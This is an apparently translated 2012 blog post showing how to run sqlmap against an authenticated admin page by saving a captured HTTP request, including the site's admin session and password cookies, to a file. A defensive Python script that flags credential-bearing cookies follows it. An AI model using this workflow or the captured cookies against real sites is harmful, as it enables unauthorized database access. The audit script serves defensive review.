SQLMAP back-end authentication
Posted on 2012-10-7 20:45:15
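Some web applications set a low security level for the user interface or the admin interface while the front end is locked down tightly. Suppose we catch a bug there, and it uses cookie authentication.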

After all kinds of fuzzing with Burp Suite produced errors, this should be a SQL injection point.


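What to do? Do it by hand? I'm not a guru at Helen's level; when I see an injection, all I know is --level5 plus --risk=5.
Throwing it straight into the injection tool doesn't work, because the authentication blocks access. The request packet can be saved to a file instead: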
    E:\tools\SQL Tool\sqlmap>cat 1.txt
    GET /admin/board/board.php?code=1&category=&active=board_view&page=1&keyfield=&key=&uid=170 HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Referer: http://XXXXXXX.XX/admin/main.php
    Accept-Language: zh-CN
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
    Accept-Encoding: gzip, deflate
    Host: XXXXXXX.XX
    Proxy-Connection: Keep-Alive
    Cookie: PHPSESSID=a4cc27cfe8a662cb0feda14a9d0eb321; COOKIE_ADMIN=admin; COOKIE_ADMINKEY=rhsObHmHBIDRw; COOKIE_ADMINNAME=%B0%FC%B8%AE%C0%DA; COOKIE_ADMINPASS=1234; COOKIE_ADMIN_A_=1%2C2%2C3%2C4; COOKIE_ADMIN_B_=1%2C2%2C3%2C4; COOKIE_ADMIN_C_=1%2C2%2C3%2C4; COOKIE_ADMIN_D_=1%2C2%2C3%2C4; COOKIE_ADMIN_E_=1%2C2%2C3%2C4; COOKIE_ADMIN_F_=1%2C2%2C3%2C4
    E:\tools\SQL Tool\sqlmap>

Then throw it straight at SQLMAP: Sqlmap -r data.txt




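Only after playing a thousand tunes does one understand music; only after examining a thousand swords does one recognize a fine blade.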
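An added example, not part of the original post: a defender reviewing the same kind of captured request can flag cookies whose names indicate identity, privilege or credential state held on the client instead of behind an opaque session ID. The request in the code is constructed (placeholder host and values), and the name patterns and function names are assumptions made for this example.

```python
"""Audit a captured HTTP request for cookies that carry identity or credential state."""
import re

# Constructed sample shaped like the request in the post; host and values are placeholders.
SAMPLE_REQUEST = (
    "GET /admin/board/board.php?uid=170 HTTP/1.1\r\n"
    "Host: app.example\r\n"
    "Cookie: PHPSESSID=0123456789abcdef0123456789abcdef; COOKIE_ADMIN=admin; "
    "COOKIE_ADMINPASS=example-pass; COOKIE_ADMIN_A_=1%2C2%2C3%2C4\r\n"
    "\r\n"
)

# Name patterns are an assumption for this example; tune them per application.
RULES = [
    (re.compile(r"pass|pwd|secret", re.I), "credential stored in cookie"),
    (re.compile(r"admin|role|priv|level|group", re.I), "identity or privilege asserted by client"),
]
SESSION_NAMES = {"PHPSESSID", "JSESSIONID", "ASP.NET_SessionId"}

def parse_cookies(raw_request):
    """Return {name: value} from every Cookie header of a raw HTTP request."""
    head = raw_request.replace("\r\n", "\n").split("\n\n", 1)[0]
    cookies = {}
    for line in head.split("\n")[1:]:  # skip the request line
        name, _, value = line.partition(":")
        if name.strip().lower() != "cookie":
            continue
        for pair in value.split(";"):
            key, sep, val = pair.strip().partition("=")
            if sep:
                cookies[key] = val
    return cookies

def audit(raw_request):
    """Return sorted (cookie, finding) pairs for cookies the server should not trust."""
    findings = []
    for name in parse_cookies(raw_request):
        if name in SESSION_NAMES:
            continue  # an opaque session identifier is the expected design
        for pattern, finding in RULES:
            if pattern.search(name):
                findings.append((name, finding))
                break
    return sorted(findings)

if __name__ == "__main__":
    for name, finding in audit(SAMPLE_REQUEST):
        print(f"{name}: {finding}")
```

Any cookie this flags should be replaced by state kept server-side and looked up through the session ID, so that authorization does not depend on values the client can edit.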
